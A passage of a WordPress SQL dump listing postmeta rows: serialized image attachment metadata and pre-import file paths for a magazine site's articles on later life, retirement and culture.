s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(268,92,'_edit_lock','1522697733:1'),(273,105,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/01/letter-from-the-editor.html'),(274,108,'_wp_attached_file','2018/04/artisanal-market-cheese_4460x4460.jpg'),(275,108,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:4460;s:6:\"height\";i:2973;s:4:\"file\";s:45:\"2018/04/artisanal-market-cheese_4460x4460.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"artisanal-market-cheese_4460x4460-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"artisanal-market-cheese_4460x4460-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:45:\"artisanal-market-cheese_4460x4460-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:46:\"artisanal-market-cheese_4460x4460-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"newsmagbd_news_block_size\";a:4:{s:4:\"file\";s:45:\"artisanal-market-cheese_4460x4460-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"newsmagbd_block_size_cropping\";a:4:{s:4:\"file\";s:45:\"artisanal-market-cheese_4460x4460-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(276,110,'_wp_attached_file','2018/04/artist-designer-at-work_925x.jpg'),(277,110,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:925;s:6:\"height\";i:617;s:4:\"file\";s:40:\"2018/04/artist-designer-at-work_925x.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"artist-designer-at-work_925x-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"artist-designer-at-work_925x-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:40:\"artist-designer-at-work_925x-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"newsmagbd_news_block_size\";a:4:{s:4:\"file\";s:40:\"artist-designer-at-work_925x-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"newsmagbd_block_size_cropping\";a:4:{s:4:\"file\";s:40:\"artist-designer-at-work_925x-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1508333665\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(281,136,'_wp_attached_file','2018/04/art-supplies_4460x4460.jpg'),(282,136,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:4460;s:6:\"height\";i:2973;s:4:\"file\";s:34:\"2018/04/art-supplies_4460x4460.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"art-supplies_4460x4460-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"art-supplies_4460x4460-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"art-supplies_4460x4460-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:35:\"art-supplies_4460x4460-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"newsmagbd_news_block_size\";a:4:{s:4:\"file\";s:34:\"art-supplies_4460x4460-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"newsmagbd_block_size_cropping\";a:4:{s:4:\"file\";s:34:\"art-supplies_4460x4460-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(283,139,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/04/a-powerful-way-to-invest.html'),(285,176,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/05/in-honor-of-older-americans-month-happy-80th-birthday-mom.html'),(286,198,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/07/bibliophiles-corner-the-earthquake-machine-by-mary-pauline-lowry.html'),(287,205,'_wp_attached_file','2018/04/44-1.jpg'),(288,205,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:966;s:6:\"height\";i:674;s:4:\"file\";s:16:\"2018/04/44-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"44-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"44-1-300x209.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:209;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"44-1-768x536.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"newsmagbd_news_block_size\";a:4:{s:4:\"file\";s:16:\"44-1-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"newsmagbd_block_size_cropping\";a:4:{s:4:\"file\";s:16:\"44-1-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(289,210,'_wp_attached_file','2018/04/44-2.jpg'),(290,210,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:966;s:6:\"height\";i:674;s:4:\"file\";s:16:\"2018/04/44-2.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"44-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"44-2-300x209.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:209;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"44-2-768x536.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"newsmagbd_news_block_size\";a:4:{s:4:\"file\";s:16:\"44-2-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"newsmagbd_block_size_cropping\";a:4:{s:4:\"file\";s:16:\"44-2-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(291,215,'_wp_attached_file','2018/04/44-4.jpg'),(292,215,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:966;s:6:\"height\";i:674;s:4:\"file\";s:16:\"2018/04/44-4.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"44-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"44-4-300x209.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:209;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"44-4-768x536.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"newsmagbd_news_block_size\";a:4:{s:4:\"file\";s:16:\"44-4-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"newsmagbd_block_size_cropping\";a:4:{s:4:\"file\";s:16:\"44-4-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(293,221,'_wp_attached_file','2018/04/44-5.jpg'),(294,221,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:966;s:6:\"height\";i:674;s:4:\"file\";s:16:\"2018/04/44-5.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"44-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"44-5-300x209.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:209;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"44-5-768x536.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"newsmagbd_news_block_size\";a:4:{s:4:\"file\";s:16:\"44-5-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"newsmagbd_block_size_cropping\";a:4:{s:4:\"file\";s:16:\"44-5-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(295,227,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/08/building-a-bright-future.html'),(297,229,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/08/get-up-and-go-august.html'),(298,230,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/08/getting-to-know-you.html'),(301,231,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/08/into-the-wild-2.html'),(302,232,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/08/its-good-to-talk-2.html'),(303,233,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/08/ive-always-been-naughty-making-people-laugh-is-a-very-powerful-?thing-to-do-2.html'),(305,235,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/08/leaving-your-home-in-safe-hands-2.html'),(306,236,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/08/love-or-lust-at-first-sight.html'),(308,238,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/08/planning-pays-off.html'),(311,239,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/08/putting-the-fun-into-fitness-2.html'),(312,241,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/08/shes-reading-it-are-you.html'),(313,242,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/08/societys-ethical-dilemma.html'),(314,243,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/08/the-best-of-both-worlds-2.html'),(315,244,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/08/too-old-to-break-a-taboo.html'),(316,245,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/09/love-is-a-drug.html'),(317,246,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/09/love-thy-neighbour.html'),(318,247,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/12/comfort-independence-and-security.html'),(320,249,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/12/get-up-and-go-december.html'),(321,250,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/12/own-your-future-2.html'),(322,251,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/12/the-best-of-both-worlds.html'),(323,252,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2017/12/the-gift-of-sight-2.html'),(324,253,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/03/get-up-go-march.html'),(325,254,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/03/how-my-fathers-death-showed-me-i-was-not-as-ruthless-as-i-thought.html'),(326,255,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/03/how-rufus-the-dog-puts-marathon-pair-through-paces.html'),(327,256,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/03/im-certain-that-golf-is-the-best-game-in-the-world-to-be-bad-at.html'),(328,257,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/03/interview-herbie-kretzmer-les-miserables-scriptwriter.html'),(329,258,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/03/lincoln-a-story-of-struggle-sacrifice-and-some-success.html'),(330,259,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/03/make-the-most-of-later-life.html'),(332,261,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/03/the-golden-years-of-rock-and-roll.html'),(333,262,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/03/the-marvel-of-marrakech.html'),(334,263,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/03/why-her-majesty-should-invite-mirren-to-perform-at-windsor.html'),(335,264,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/03/why-i-have-to-make-every-second-count.html'),(336,266,'_wp_attached_file','2018/04/abandoned-building_4460x4460.jpg'),(338,266,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:4459;s:6:\"height\";i:2584;s:4:\"file\";s:40:\"2018/04/abandoned-building_4460x4460.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"abandoned-building_4460x4460-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"abandoned-building_4460x4460-300x174.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:40:\"abandoned-building_4460x4460-768x445.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:445;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:41:\"abandoned-building_4460x4460-1024x593.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:593;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"newsmagbd_news_block_size\";a:4:{s:4:\"file\";s:40:\"abandoned-building_4460x4460-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"newsmagbd_block_size_cropping\";a:4:{s:4:\"file\";s:40:\"abandoned-building_4460x4460-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(339,267,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/05/bringing-quality-to-later-life.html'),(341,269,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/05/how-i-see-it-monica-porter.html'),(342,270,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/05/how-the-paignton-peach-became-the-face-of-wimbledon.html'),(343,271,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/05/majority-of-us-not-prepared-for-unexpected-retirement.html'),(344,272,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/05/now-i-have-eyesight-like-everyone-else.html'),(346,274,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/05/queen-delivers-good-news-for-future-of-state-pension.html'),(347,275,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/05/you-dont-worry-about-things-that-might-have-tortured-you-when-you-were-younger.html'),(348,276,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/06/putting-the-can-into-beating-cancer-one-step-at-a-time.html'),(351,279,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/10/companionship-for-older-people-this-christmas.html'),(352,281,'_wp_attached_file','2018/04/abandoned-home-in-field_4460x4460.jpg'),(353,280,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/10/dont-let-the-downturn-put-a-downer-on-retirement.html'),(354,281,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:4460;s:6:\"height\";i:2973;s:4:\"file\";s:45:\"2018/04/abandoned-home-in-field_4460x4460.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"abandoned-home-in-field_4460x4460-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"abandoned-home-in-field_4460x4460-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:45:\"abandoned-home-in-field_4460x4460-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:46:\"abandoned-home-in-field_4460x4460-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"newsmagbd_news_block_size\";a:4:{s:4:\"file\";s:45:\"abandoned-home-in-field_4460x4460-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"newsmagbd_block_size_cropping\";a:4:{s:4:\"file\";s:45:\"abandoned-home-in-field_4460x4460-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 6D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1506533554\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"24\";s:3:\"iso\";s:3:\"320\";s:13:\"shutter_speed\";s:6:\"0.0025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(355,282,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/10/get-up-and-go-october-2013.html'),(358,285,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/10/mha-helping-you-get-more-from-later-life.html'),(360,287,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/10/my-afternoon-at-the-savoy-taking-tea-with-christine-keeler.html'),(361,288,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/10/pioneering-surgery-offering-the-gift-of-sight.html'),(362,289,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/10/the-city-that-never-sleeps-new-york-in-48-hours.html'),(363,290,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/10/you-can-own-your-future.html'),(364,291,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/11/obituaries.html'),(365,292,'URL_before_HTML_Import','/var/www/westonspirit.org.uk/html/ben/2018/11/raymond-blanc-you-cant-separate-food-from-life.html'),(367,294,'_wp_attached_file','2018/04/abandoned-iceland-farm-home_4460x4460.jpg'),(368,294,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:4460;s:6:\"height\";i:2973;s:4:\"file\";s:49:\"2018/04/abandoned-iceland-farm-home_4460x4460.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:49:\"abandoned-iceland-farm-home_4460x4460-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:49:\"abandoned-iceland-farm-home_4460x4460-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:49:\"abandoned-iceland-farm-home_4460x4460-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:50:\"abandoned-iceland-farm-home_4460x4460-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"newsmagbd_news_block_size\";a:4:{s:4:\"file\";s:49:\"abandoned-iceland-farm-home_4460x4460-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"newsmagbd_block_size_cropping\";a:4:{s:4:\"file\";s:49:\"abandoned-iceland-farm-home_4460x4460-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"Canon EOS 6D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1506533292\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"55\";s:3:\"iso\";s:3:\"320\";s:13:\"shutter_speed\";s:6:\"0.0025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(369,295,'_wp_attached_file','2018/04/abandoned-waterpark_4460x4460.jpg'),(370,295,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:4460;s:6:\"height\";i:2974;s:4:\"file\";s:41:\"2018/04/abandoned-waterpark_4460x4460.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:41:\"abandoned-waterpark_4460x4460-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:41:\"abandoned-waterpark_4460x4460-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:41:\"abandoned-waterpark_4460x4460-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:42:\"abandoned-waterpark_4460x4460-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"newsmagbd_news_block_size\";a:4:{s:4:\"file\";s:41:\"abandoned-waterpark_4460x4460-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"newsmagbd_block_size_cropping\";a:4:{s:4:\"file\";s:41:\"abandoned-waterpark_4460x4460-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(371,296,'_wp_attached_file','2018/04/abandoned-waterpark-in-winter_4460x4460.jpg'),(372,296,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:4460;s:6:\"height\";i:2974;s:4:\"file\";s:51:\"2018/04/abandoned-waterpark-in-winter_4460x4460.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:51:\"abandoned-waterpark-in-winter_4460x4460-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:51:\"abandoned-waterpark-in-winter_4460x4460-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medi